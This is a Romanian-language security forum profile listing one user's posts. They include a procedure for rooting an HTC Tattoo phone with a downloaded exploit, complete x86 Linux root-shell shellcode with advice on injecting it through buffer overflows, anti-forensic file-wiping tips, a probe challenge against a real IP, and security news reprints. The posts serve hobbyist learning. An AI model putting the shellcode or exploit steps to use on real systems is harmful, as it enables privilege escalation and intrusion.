-
Posts
2099 -
Joined
-
Last visited
-
Days Won
17
Everything posted by pyth0n3
-
Cum sa obtii root intrun telefon HTC Tatoo
pyth0n3 replied to pyth0n3's topic in Tutoriale in romana
Pai e simplu , am descris doar in detaliu toata procedura . oricum dureaza in jur de 3-4 ,minute inafara de descarcat programele, depinde cat de repede reusesti sa tastezi Hero are ca firmware Android OS, v1.5 , exista un tool care face automat , Htc tatoo are ca firmware Android OS, v1.6 , am incercat aceeasi procedura cu APK dar nu a mers Oricum se poate scrie un script BASH care fa in automat sau Unul BAT pt windows -
Tocmai aici e problema , eu nu stiam ce sa fac si am instalat un trojan la prietena mea in calculator , Cred ca sunt un mare hacker deoarece am access acum la calculator si stii ce fac? Ii fac reboot , ii deschid webcamul , si cel mai mult imi place sa scriu messaje colorate pe eccran cu verde "Eu sunt la tine in calculator " Eu sunt un hacker pt ca stiu sa fac asta , cine mai stie? hai ca sunteti si voi hackeri daca stiti .
-
Cum sa obtii root intrun telefon HTC Tatoo
pyth0n3 replied to pyth0n3's topic in Tutoriale in romana
Foloseste ca shell bash ,dar nu vei avea toate comenzile disponibile , le poti instala Poti face ls ca sa vezi ce opziuni ai Deci daca cineva vrea sa faca o comparatie intre apple ai android ,android e gratis si se poate modifica tot codul din kernel , -
Explicati ceea ce credeti ca inseamna hacker pt voi , de ce crezi ca ce faci inseamna ca esti un hacker? Ce te face sa crezi ca e un hacker? A face un deface inseamna ca esti un hacker? Daca spargi un account yahoo,msn,hi5,facebook sau ma rog esti un hacker? Daca folosesti un tool de tipul trojan sau rat esti un hacker? Nu vreau raspunsuri din dictionare ,vreau doar raspunsuri de la voi , orice ganditi , orice va face sa credeti ca face un hacker
-
Sunt aici pt ca sa pot conversa cu cineva despre anumite lucruri care ma apasioneaza , Nu intru in discuzie in multe topicuri , nici macar nu le citesc ,Imi face placere sa raspund in anumite topicuri unde cineva are o problema si stiu raspunsul deoarece de multe ori am intalnit probleme pe care nu le-am putut rezolva si as fi fost dispus sa platesc ca cineva sa ma ajute sa inteleg anumite lucruri ,dar nu era nisesc sa ma corectemeni ca sa imi explice Si stiu ce inseamna cand la cineva nu ii iesa sa configureze sau sa faca ceva Stiu si ca in asemenea locuri ca acest forum se afla o gramada care incurca sau cauta ceva , incearca sa te jigneasca cu ceva ,desi nu vad nici un sens Tebuie sa dovedesti ce stii ajutand alte persoane care au nevoie nu insultand acele persoane Vreau doar sa raspund la subiact la anumite topicuri ,iar daca gresesc sa ma corecteze cineva in termeni informatici si nu in a vorbi lucruri fara sens cum multi sunt obijnuiti sa faca Vreau sa am anumite raspunsuri , si ajutor din partea cellorlalti la anumite lucruri pe care nu le cunosc, nu vreau sa ma trimiteti pe goolge tot timpul, vreau sa imi explicati voi unde nu stiu Daca gresesc sa scriu in limba romana , la gramatica corectatima pt ca nu pot fii perfect in anumite lucruri cum si voi ati gresi de exemplu in aceasta limba Slavona pe care de exemplu eu o cunosc destul de bine IMi pare rau ca multi inca nu reusesc sa inteleaga termini Hacker si Hacking A face un deface nu inseamna a fi un hacker oricum , pt ca nu esti tare deoarece pui un query pe care il gasesti pe Milw0rm intrun site si asta inseamna ca ai facut SQL injection ,sau o faci cu anumite tool Daca ii iei passwordul la un user normal nu inseamna ca faci hacking A folosi un Trojan sau un Rat nu inseamna hacking Sunt multe lucruri pe care multi nu le inteleg si nu cred ca le vor intelege vreodata Nici macar a fura conturi paypal nu inseamna a face hacking Trebuie intelese mai multe lucruri inainte de a incepe a face anumite lucruri Cati stiu cum functioneaza un pachet in retea , sau un protocol ? Fac sniffing fara sa stie ce e un header Tcp sau Ip sau ma rog
-
Aici voi explica ceea ce am facut ca sa obtin root intrun telefon HTC Tatoo ,avand ca sistem operativ Android avand versiunea de kernel 2.6.29-gf922717 Acest lucru se poate face utilizand ,Linux,windows,mac Eu am folosit ca sistem operativ Linux Sunt cateva lucruri de descarcat intai Android SDK Fastboot ADB ne va permite sa comunicam cu Android in recovery mode Fastboot se poate folosi cand celularul este poernit in modalitatea fastboot Dupa ce am descarcat aceste doua lucruri trebuie sa le scoatem din arhiva Vom avea doua Directory Fastboot si android-sdk-linux_86 , eu am renumit al doilea directory cu numele android ca sa fie mai usor la lucrez in terminal Va trebui copiat ce e in directorul fastboot in /android/tools Vom merrge in cellular ca sa activam optiune Debug USB Settings>Application>Development>Debug USB Vom da urmatoarele comezi pt ca sa putem executa programele pe care le-am descarcat cd /android/tools chmod +x fastboot Urmatorul pas l-am facut pt ca sa imi semplific munca Am exportat Path-ul pt programe in asa fel incat sa nu mai folosesc spre exemplu /home/user/android/tools/./adb options Ci doar adb options Fiecare cum prefera Pt a face export de PATh efectuam urmatorul comand echo 'export PATH=/home/user/android/tools/:$PATH' >> /home/user/.bashrc Conectam telefonul la computer si dam urmatorul comand sa vedem daca il recunoaste adb devices Sau cum am mai zis daca nu ati exportat nimic /home/user/android/tools/./adb devices Aici va trebui sa fiti admin si nu user normal pt ca doar adminul poate avea aceste drepturi Acesta este un output pe care il veti avea List of devices attached HT93YKF00480 Acum va trebui sa descarcam un exploit pe care il vom urca in telefon si il vom executa L-am pus la descarcat aici , tatt00hack.rar dar il puteti gasi oriunde pe internet Dupa ce l-ati descarcat va trebui extras din arhiva Deci vom avea un directory care se chiama tatt00hack Cu urmatoarele comenzi vom copia ce avem nevoie din acest directory in telefon cd tatt00hack adb push m7 /data/local/bin/m7 adb push tattoo-hack.ko /data/local/bin/tattoo-hack.ko adb push su /sdcardSi in acest caz atenzie specificati exact unde se afla adb in caz ca nu ati facut export de PATH Acum sa trecem la exploit Vom deschide un terminal in telefon adb shell Vom face in asa fel incat exploit-ul sa se poata executa ,deci ii vom da drepturile chmod 755 /data/local/bin/m7 Vom merge in bin cd /data/local/bin Vom executa codul while true ; do /data/local/bin/m7; done Acum va trebui sa avem un output asemanator a acestuia: reroc/2174/cmdline[ WIN! 2174 EIP: b0000100 Instruction executed: e1a0000d Wrote shellcode e0400000 line 0 Wrote shellcode e3a07023 line 1 Wrote shellcode ef000000 line 2 Wrote shellcode e0400000 line 3 Wrote shellcode e3a07017 line 4 Wrote shellcode ef000000 line 5 Wrote shellcode e0433003 line 6 Wrote shellcode e28f0014 line 7 Wrote shellcode e50d0008 line 8 Wrote shellcode e50d3004 line 9 Wrote shellcode e24d1008 line 10 Wrote shellcode e24d2004 line 11 Wrote shellcode e3a0700b line 12 Wrote shellcode ef000000 line 13 Wrote shellcode 7379732f line 14 Wrote shellcode 2f6d6574 line 15 Wrote shellcode 2f6e6962 line 16 Wrote shellcode 6873 line 17 Wrote shellcode 0 line 18 [ Overwritten 0xb0000100 Veti putea observa ca semnul $ a devenit # Deci suntem root Pt a mentine acest drept dupa reboot va trebui sa efectuam inca cateva comenzi export LD_LIBRARY_PATH=/system/lib export PATH=/system/bin insmod /data/local/bin/tattoo-hack.ko mount -o rw,remount /dev/block/mtdblock5 /data mount -o rw,remount /dev/block/mtdblock3 /system La urmatorul comand probabil vom avea o erroare , nui nimic continuam mv /system/bin/su /system/bin/su.old cat /sdcard/su > /system/bin/su chmod 6755 /system/bin/su Acum vom face reboot la telefon reboot In telefon vom putea descarca o aplicatie care se chiama Terminal Emulator Arata cam asa ceva de default Iar eu am facut ca sa arate cam asa ceva Ca sa fim root va trebui sa executam urmatoarele comenzi cd /system/bin Dupa care folosim urmatorul comand pt root su Iar ca sa fim siguri ca suntem root dam comandul id Va trebui sa avem urmatorul output : # iduid=0(root) gid=1000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),3001(net_bt_admin),3002(net_bt),3003(inet) Deci daca iduid=0(root) suntem root Puteti instala orice port scanner , Wireless scanner , gps, google map .client rdp , proxy, vnc ,telnet,ssh, gpg,pgp , aes,rsa encryption ,client mail ,server vpn ,Whois ,banner grabber ,puteti avea chiar si un blog si inca o gramada de tool pe care vreti sa le folositi pt security assessment Port scanning folosind un telefon htc tatoo Sunt si programe pt SQL ,se pot crea si database
-
Nu ma intereseaza programul ereaser ,doar ce metode are , avand in vedere ca multe altele sunt comemerciale Ma intereseaza mai precis metodul lui Gutman Vine folosit de catre Ereaser ,vine folosit de catre Ccleaner Mie tot una ce programe folositi ,eu pot sa imi scriu un script personal care foloseste Gutman method si face acelasi lucru ca si ereazer De ce Ereaser ? E gratuit Poate fi si Ccleaner la fel avand in vedere ca are aceasi tecnica si e gratuit Acelasi lucru poate face si un script scris de mine De ce sa folosesc un tool care foloseste de exemplu metoda Gutman si costa (deci trebuie cautat un serial,crack )daca pot folosi unul gratuit Uitata putin la acest document Secure Deletion of Data from Magnetic and Solid-State Memory Avand in vedere programele eu de exemplu caut ceva gratuit Iti fac un alt exemplu De ce sa folosesti Nero pt a masteriza un cd daca poti folosi Infrarecorder care are o licenta gratuita si nu e greu ,se instaleaza in cateva secunde Cauta nero ,cauta serialul , instaleazal ,ocupa spaziu , e greu ca program Infrarecorder e gratuit si e simplu E doar o chestie de a semplifica munca , Revin la Ereaser , e singurul program gratuit care contine o gramada de metode , cum am mai zis cea principala fiind Gutman O fii o gramada de alte programe Eu prefer scriptul meu personal care foloseste metoda Gutman In rest mi-ai face o mare placere daca mi-ai zice passwordul de login de pe foum pt ca sincer nu il stiu Habar nu am ce fel de password-uri am Stiu doar ca nu sunt la fel , In rest uite putin aici SHIFT+DEL Does Not Bypass the Recycle Bin Oricum cu Shift+del se poate recupera orice file pt ca oricum asupra unui file nu vine executat nimic de special , nu se mai gaseste in Recycle bin , Vine distrus ,dar cum? Vine pus undeva acel file si vine rescris treptat cand se vor face alte processe cu timpul Cum am mai zis Metodul DOD sau Gutman nu asteapta ci il rescrie in memorie acel file de 7 ori (dod) si pana la 35 Gutman , oricum ar fi bine sa vezi cum functioneaza in detaliu In fine aceste metode vin integrate in anumite programe gratuite si comerciale Alegeti in basa preferintelor Cititi documentele la care am facut link sa intelegeti mai bine cum functioneaza In rest ramane la user daca vrea sa foloseasca ceva comercial sau gratis Nu tot timpul comercial inseamna mai bun Un script facut personal poate sa fie uneori ceva mai bun
-
OK sa luam de la capat un lucru Ereaser foloseste o metoda de rescriere a unui file care se chiama Gutman Gutmann method - Wikipedia, the free encyclopedia In primul rand nu tin sa fac reclama la acest tool pt ca nu am de ce , nu il folosesc pt ca nu am Windows Dar folosesc Shred in linux care face ceva de genul ereaser Ereaser nu e altceva decat un tool care foloseste mai multe metode de sters file cunoscute , cel mai cunoscut fiin Gutman Deci reamintec un file daca vine trimis la recycle bin practic vine pus undeva in calculator , nu vine sters Gutman rescrie partea de memorie care o ocupa file-ul respectiv de 35 de ori cu date diferite ,e ca si cum ai face format de 35 de ori pe un hard disk dupa care incerci sa mai scoti ceva de pe el Fara nici o publicitate am luat ereaser si am facut un test ,deci am sters un file , de fapt l-am rescris in memorie cu metodul Gutman dupa care am folosit niste tool ca sa il recuperez , nu sa putut recupera ,ceea ce se poate face daca il pui in recycle bin Nu numai ereaser foloseste metodul Gutman cum am mai zis , pt windows mai este CCleaner CCleaner - Optimization and Cleaning - Free Download In linux se poate folosi comandul shred Ok primul lucru pe care merg sa il fac este sa inteleg cum functioneaza Deci am facut diverse query pe google sa vad ce se intampla intrun filesystem , vazusem ca vista are un filesystem Journal care de fapt nu permite sa se piarda vreun file sters deci e mult mai usor sa fie recuperat Metoda Gutman a fost folositoare si in acest caz Nu stiu ce fel de tool detin autoritatile dar Department of Defence au facut o metoda personala care distruge file intrun computer ,vine denumita DOD method ,de fapt cred ca rescrie un file de 3 ori ,si se afla in acest tool care se chiama ereaser Citisem niste carti scrise de catre un expert de securitate Stuart McClure, unde intrun capitol gasisem ceva de genul secure erease unde era prezentat acest tool Ereaser si se vorbea despre Gutman Chestia este interesanta daca se fac diferite teste si ar trebu ca oricii sa se inteleaga cum functioneaza un filesystem , Exista si diverse forensic tools bineinteles si daca cineva studiaza poate intelege cum functioneaza anumite lucruri fara sa presupuna anumite lucruri Dupa alte cateva query pe internet am inteles ca si FBi si alte agentii de securitate au probleme in a descifra metodul Gutman Bineinteles nimic e imposibil ,si nu pot eu sa spun ca nu se poate nici nu am zis asa ceva , doar ca probabil ar lua mai mult timp Pe mine nu ma costa nimic sa folosesc comandul shred in loc de rm pt ca stiu care e diferenta Iar daca vreti ca oricare persoana sa poate vedea orice file , move it to recycle bin Dupa toate lucrurile pe care le-am citit am ajuns la o concluzie , daca cineva are de cautat ceva la mine in calculator ii voi face treaba grea iar la sfarsit vom vedea raspunsul Urmatorul video explica foarte clar anumite lucruri despre cum sa faceti in asa fel incat sa nu se poata gasi nimic in calculator folosind Forensic tools Va anunt ca are 3 ore si 7 minute ,asadar nu multi se vor uita la el dar sa stiti ca e important pt ca arata cum functioneaza anumite lucruri foarte clar Anti-Forensics: Occult Computing* (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Esti sigur de ceea ce spui? Cat de sigur? Nu se mai poate face boot , asta nu inseamna ca nimeni nu poate boota nimic In al doilea rand daca tu vii sa imi spui mie ca se poate recupera inseamna ca ai recuperat si stii cum sa faci Sau cel putin imi spui ca nu se poate sterge nimic folosind metodele care am zis eu Dovedestemi , descriemi cum , argumente ,fapte ,exemple Ai facut practica? Pe ceea ce am scris ? Vrei sa iti explic eu cum functioneaza metoda sau esti in stare sa o faci singur? Descarca Ereaser de aici Eraser Descarca acest tool pt a recupera ceea ce cancelezi de aici Disk Investigator Info and Download page sau descarca oricare tool vrei tu pt a recupera date , dute si cumpara unul daca e necesar Fa niste probe dar mai intai trebuie sa stii cum functioneaza ereaser si ceea ce face Citeste putin aici Gutmann method - Wikipedia, the free encyclopedia Informeazate mai bine si fa niste test Trebuie sa stii cum functioneaza un lucru Eu cred ca reuseste sa faca erease si intrun file-system Journal Ar trebui sa citesti si cum functioneaza un file-system Intrebarea e dispune cineva de un buget si resurse pt a recupera datele din pc-ul tau ? Daca da merita sa o faca?
-
Sunt sigur ca multi folosesc aceste metode Le recomand pt toti sunt foarte tari , in momentul in care citeam chiar incepeam sa cred si eu ca e adevarat
-
Nu mi se pare chiar atat de simplu , vroiam doar sa arat un simplu shellcode care poate fi introdus in orice fel de exploit vreti sa scrieti . Deci daca vreti sa exploatati un program sau ma rog orice fel de tool , daca aveti codul sorgent esta mai bine , treceti la debugging dupa care trebuie cautat o erroare care poate genera un buffer overflow , in acest caz scrieti un script chiar in perl care va introduce acest shell code folosind functia "print " in momentul cand acel program va avea acea erroare deci in loc sa mearga in crash daca ii puneti acest code va va da o shell sh De obicei cand un program are o erroare merge in crash pt ca nu are alta posibilitate ,daca cineva ii va introduce un shellcode , in loc sa mearga in crash va executa acel shellcode, in acest caz exemplele de mai sus creaza o shell deci veti avea o shell in care puteti executa orice fel de comenzi vreti De exemplu exista un server ftp care vine folosit de root si are o erroare de buffer overflow , in acest caz scrieti un script in perl care sa introduca un shellcode .Serverul ftp nu va merge in crash dar va va da o shell de root pt ca in acest caz serverul este folosit de catre root Intradevar sunt multe lucruri de invatat , pt ca acest code functioneaza doar pt procesoarele Intel si Amd x86 si doar in Linux Pt fiecare procesor trebuie scris in mod divers Ar trebui multe tutoriale sau mai bine zis carti care sa explice mai cu amanunte cum functioneaza un procesor si registrii din el Bineinteles daca cineva cunoaste bine aceste lucruri il rog sa scrie un tutorial , voi incerca si eu sa scriu ceva pe viitor pt a explica anumite lucruri . Doar ceea ce stiu si eu pana in prezent Daca vrea cineva sa scrie un tutorial care sa explice cum functioneaza registri unui CPU in mod clar si simplu il rog sa o faca Doar asa se pot intelege mai multe lucruri Daca ati observat codul fiecare stringa vine comentata De exemplu comandul mov nu face altceva decat sa puna niste date in registri EAX ,EBX, ECX Aceste date sunt niste syscall de exemplu in linux pt a vedea care sunt syscall puteti da urmatorul comand cat /usr/include/asm/unistd_32.h In caz ca aveti un OS 64 bit cat /usr/include/asm/unistd_64.h Daca nu incercati cat /usr/include/asm/unistd.h Deci importan este sa se inteleaga ce inseamna registri unui cpu CPU registers Ficare code poate fi scris doar pt un sistem in parte , exemplele de mai sus nu vor functiona pe procesoare SPARC sau in windows de exemplu ,si nici nu vor functiona intrun sistem linux 64 bit
- 28 replies
-
- bootloader
- limbajul de asamblare
-
(and 1 more)
Tagged with:
-
Nu ar fii bine sa continui cu un tutorial simplu ca sa inteleaga toti de exemplu cum funcrioneaza registri ? CPU registers Cel putin pe mine ma intereseaza asm pt procesoarele intel x86 in Linux C0de 32 bit care genereaza o shell , poate fii introdus in orice exploit , In cazul unei vulnerabilitati de buffer overflow ,sau chiar oricare alta poate fi rescrisa adressa de intoarcere cu acest code care va intoarce in acest caz o shell sh ; setreuid(uid_t ruit, uid_id xor eax, eax ; First eax must be 0 for the next instruction mov al, 70 ; Put 70 into eax, since setreuid is syscall #70 xor ebx, ebx ; Put 0 into ebx, to set the real uid to root xor ecx, ecx ; Put 0 into ecx, to set the effective uid to root int 0x80 ; Call the kernel to make the system call happen jmp short two ; jump down to the bottom to get the address of "/bin/sh" one: pop ebx ; pop the "return address" from the stack ; to put the address of the string into ebx ; execve(const char *filename, char *const argv [], char *const envp[]) xor eax, eax ; Clear eax mov [ebx+7], al ; Put the 0 from eax after the "/bin/sh" mov [ebx+8], ebx ; Put the address of the string from ebx here mov [ebx+12], eax ; Put null here mov al, 11 ; execve is syscall #11 lea ecx, [ebx+8] ; Load the address that points to /bin/sh lea edx, [ebx+12] ; Load the address where we put null int 0x80 ; Call the kernel to make the system call happen two: call one ; Use a call to get back to the top to get this; address db '/bin/sh' Important este ca codul sa fie curat fara byte null deoacere executia se va opri la primul byte null de exemplu 00 Acest lucru poate fi controlat cu orice fel de editor hex Pt a asembla codul se poate folosi nasm Salvati codul intrun file cu extensie .nasm dupa care dati urmatorul command nasm shell.asm Cu un editor hex se controleaza sa nu existe vreun byte null hexedit shell Output 00000000 66 31 C0 B0 46 66 31 DB 66 31 C9 CD 80 EB 21 66 f1..Ff1.f1....!f 00000010 5B 66 31 C0 67 88 43 07 67 66 89 5B 08 67 66 89 [f1.g.C.gf.[.gf. 00000020 43 0C B0 0B 67 66 8D 4B 08 67 66 8D 53 0C CD 80 C...gf.K.gf.S... 00000030 E8 DC FF 2F 62 69 6E 2F 73 68 .../bin/sh sa vedem cat e de lung acest code wc -c shell Output: 58 shell Deci e di 58 byte Dupa cum se observa este un code curat fare null byte Important este ca acest shellcode sa se execute fara sa fie intrerupt deoarece daca exista un byte null nu va fi executat si probabil va da o erroare de segmentation fault iar programul vulnerabil va merge in crash Exista shell coduri mai mici care fac acelasi lucru BITS 32 ; setreuid(uid_t ruid, uid_t euid) push byte 70 ; push the byte value 70 to the stack pop eax ; pop the 4-byte word 70 from the stack xor ebx, ebx ; put 0 into ebx, to set real uid to root xor ecx, ecx ; put 0 into ecx, to set effective uid to root int 0x80 ; Call the kernel to make the system call happen ; execve(const char *filename, char *const argv [], char *const envp[]) push ecx ; push 4 bytes of null from ecx to the stack push 0x68732f2f ; push "//sh" to the stack push 0x6e69622f ; push "/bin" to the stack mov ebx, esp ; put the address of "/bin//sh" to ebx, via esp push ecx ; push 4 bytes of null from ecx to the stack push ebx ; push ebx to the stack mov ecx, esp ; put the address of ebx to ecx, via esp cdq ; put 0 into edx using the signed bit from eax mov al, 11 ; put 11 into eax, since execve() is syscall #11 int 0x80 ; call the kernel to make the syscall happen Pt a asembla codul se poate folosi nasm nasm smallcode.asm hexedit smallcode Output 00000000 6A 46 58 31 DB 31 C9 CD 80 51 68 2F 2F 73 68 68 jFX1.1...Qh//shh 00000010 2F 62 69 6E 89 E3 51 53 89 E1 99 B0 0B CD 80 /bin..QS....... Acest code face acelasi lucru doar ca este mai mic wc -c smallcode output: 31 smallcode Dupa cum vedeti e numai de 31 byte Face acelasi lucru ca si primul code doar ca e mai mic aproape jumatate
- 28 replies
-
- bootloader
- limbajul de asamblare
-
(and 1 more)
Tagged with:
-
@Usr6 In primul rand inca nu am reusit sa gasesc textul in clar de la hash , desi de cand ai postat am puso la crack , probabil va lua mai mult timp, probabil se vor termina cuvintele din dictionar si nu va fi gasita In al doilea rand nu stiu ce te-au facut sa crezi posturile pe care le-am facut in rubrica challenge pt ca inca nu vad nici un rezultat la ele chiar daca sunt destul de usoare . Cel putin le-am facut in asa fel incat sa existe posibilitatea de a fi rezolvate . Raspunsurile la toate challenge-urile se gasesc pe acest forum , nu e nevoie de google Uneori raspunsurile sunt sub nasul tuturor , important e sa deschida ochii Imi place sa ma joc , intai dau raspunsul , dupa care fac un challenge Trebuie doar puse unul langa altul , nu trebuie cautat pe google in acest caz Stiu ca multi stiu raspunsurile si nu le pun , fac bine astept sa raspunda ceilalti @Usr6 Nu toate hashurile se pot craka , oricum inca nam terminat , intrebarea mea a fost simpla , care din urmatoarele tipuri? Chiar trebuie sa fac un tabel cu ele? # Packet Filtering # Circuit Gateways # Stateless Firewall #Application Level Proxy # Stateful Packet Inspection # Internet Connection Firewall # Hybrid Firewall Dar aici ca raspuns ma astept ca cineva sa explice si de ce e de tipul de care e? Cu cuvintele lui
-
Hacking - Security-Programming-Unix/Linux Astept sugestii , critici , sfaturi ,doar asa pot face ceva mai bun Este primul blog
-
Level = Easy . Determinati ce tip de firewall este aici 198.182.196.48 Descrieti cum ati facut
-
DAVTest – WebDAV Vulnerability Scanning (Scanner) Tool
pyth0n3 replied to begood's topic in Programe hacking
Thanks! And thanks again ! -
Salut , unde te afli mai exact?
-
Angry Romanian hackers deface Telegraph for Top Gear toss
pyth0n3 posted a topic in Stiri securitate
15th April 2010 Subdomains maintained by The Daily Telegraph website were defaced by a group of angry Romanian hackers on Thursday. The two subdomains - shortbreaks.telegraph.co.uk and wine-and-dine.telegraph.co.uk/site/index.php - were sprayed with identical digital graffiti by the hackers from the previously unknown RNS – Romanian National Security group. Sunbelt Software reports that the group appears to be angry at the Telegraph's alleged racism against Romanians, as a translation of the defacement illustrates. We are sick and tired of seeing how some "garbage" like you try to mock our country. [And try] to create [for us] a completely different picture compared to the real one, and calling us "romanian gypsies" [,] broadcast s****y tv programs like TopGear." If you had the nerve to angry an entire country, know that we will not stop here! Romania. Followed by an even clearer statement of indignation, in English Guess What, Gypsies aren't Romanians, morons. Both defaced pages play a folk song called The Lonely Shepard by Gheorghe Zamfir and contain links to a Top Gear clip that apparently prompted the outburst. Top Gear presenter James May is a columnist for The Telegraph. At the time of writing on Thursday afternoon one of the sites remains defaced (shortbreaks.telegraph.co.uk) while the other was cleaned. Chris Boyd of Sunbelt Software said that neither of the attacked domains were high profile or linked to from the paper's front page. It's unclear what attack techniques and vulnerabilities were used to pull off the attack. The Telegraph has been notified of the hack. Source :theregister.co.uk Deface:http://www.pcpro.co.uk/gallery/news/357298/telegraph-site-defaced-in-top-gear-gypsy-row -
April 12, 2010 Romanian authorites made headlines last week after busting 70 suspected cyberthieves accused of operating online auction scams. But it turns out one of the ringleaders was set free after authorities failed to file the required paperwork on time — and now he’s vanished. Police say the 70 suspects ran scams on eBay and other online auction sites since 2006. Romanian law allows suspects to be held in jail, in a so-called preventive arrest, for 29 days while an investigation is underway if authorities prove to the court that they need to hold the suspect while evidence is examined. While the court was busy ruling on an extended arrest for the other suspects, Nicolae Popescu, 30, walked out of the courthouse without the police being notified, according to a local news report. The deadline for his initial arrest had passed, and because the court had not yet ruled on his extended detention, he was allowed to leave. Romanian police defended the slip, saying there were too many criminals to process and not enough people to watch the suspects and do the paperwork. Agents had been working 48 hours and were tired, a spokesman told a local paper. Police are now appealing to the public to be on the lookout for Popescu or any of his three cars. Popescu is believed to be the ringleader of one of three separate gangs who used phishing attacks to get the login credentials of auction account holders, then used the accounts to auction nonexistent goods. Police have identified approximately 800 victims who sent money for non-existent Rolex watches, cars, yachts, private airplanes and other luxury goods. Buyers from around the world lost approximately $1 million after they sent money for winning auctions, but never received goods. According to a Romanian news source, an American buyer paid about $90,000 for a luxury aircraft in one auction. The year-long investigation, dubbed Operation Valley of the Kings, involved more than 100 search warrants and more than 700 law enforcement agents conducting searches in multiple cities. It was a joint operation between the U.S. Federal Bureau of Investigation, the U.S. Secret Service and the Romanian Directorate for Investigating Organised Crime and Terrorism (DIICOT). Thirty-one suspects were arrested in Bucharest and the rest were seized in other cities, but only 34 were detained beyond the initial arrest, according to local reports. Police seized more than $250,000 in cash in multiple currencies, a rifle, three pistols and 150 grams of gold., 70 laptops, 165 mobile phones and 2,425 SIM cards. Ten suspects were also arrested in the Czech Republic. Source : wired.com
-
Download :http://www.logicallysecure.com/resources/downloads/Linux%20Wireless%20Commands.doc Source: Wireless Security 802.11 Security Wirelessdefence.org Index
-
Thursday, April 08, 2010 Law enforcement officials from Romania and the United States arrested 70 members of three different organized crime groups for their roles in an online scam targeting eBay. The arrests came in a series of raids by the Romanian Directorate for Investigation of Organized Crime and Terrorism that took place Sunday at more than 100 different locations. The raids were conducted in conjunction with the FBI and U.S. Secret Service. According to Romanian authorities, the crimes committed by the suspects stretch back to 2006 and cross international borders into nearly a dozen countries, including Spain, Italy and the United States. Police have identified more than 800 victims, and estimated the amount stolen at 800,000 euros (more than $1 million U.S.). Thirty-one suspects were arrested in Bucharest. A video of one of the police raids can be seen here hackinthebox.org
-
English Poor Folk , by Fyodor Mikhaylovich Dostoyevsky Russian ?????? ????, ????? ??????????? ???????????? Here you can read it online in the english language Fyodor Dostoevsky's novel: Poor Folk [Read book online free] O recomand , e foarte tare, este prima carte scrisa de acest autor la o varsta inca frageda de 24 de ani Iar acum am trecut la No tech hacking by Johnny Long http://www.amazon.co.uk/No-Tech-Hacking-Engineering-Dumpster/dp/1597492159 Si asta e de citit , e foarte interesanta sa nu o pierdeti
-
Bun ,foarte intereant ,asteptam ceva de genul asta , nu reuseam nici cum sa inteleg cum functioneaza .Thanks! For the News!
-
file-roller este in orice distro linux si iti permite sa archivezi in urmatoarele formaturi (.tar.gz, .tgz), bzip (.tar.bz, .tbz), bzip2 (.tar.bz2, .tbz2), compress (.tar.Z, .taz), lzop (.tar.lzo, .tzo) and lzma (.tar.lzma) (.zip) (.jar, .ear, .war) (.7z) (.iso) (.lzh) In 7zip poti sa faci split in cati MB sau KB vrei Toate programele pt archivat de default nu folosesc o comprimare maxima Aceasta se poate seta de catre user care poate fi de tipul -9 compress better sau -1 compress faster sau -0 store only @ daatdraqq Nu le-am pus pe rapidshare doar pt faptul ca multi nu au posibilitatea sa descarce desi as fi preferat rapidshare pt ca face upload mult mai repede
-
Stau singur fara parinti , nu i-am vazut pe unii de multi ani , am un frate mai mic cu 2 ani jumate , sta cu un parinte Stau singur de cand aveam 16 ani fara sprijinul parintilor Am 22 acum. fac 23 luna viitoare Urasc copiii care stau pe banii parintilor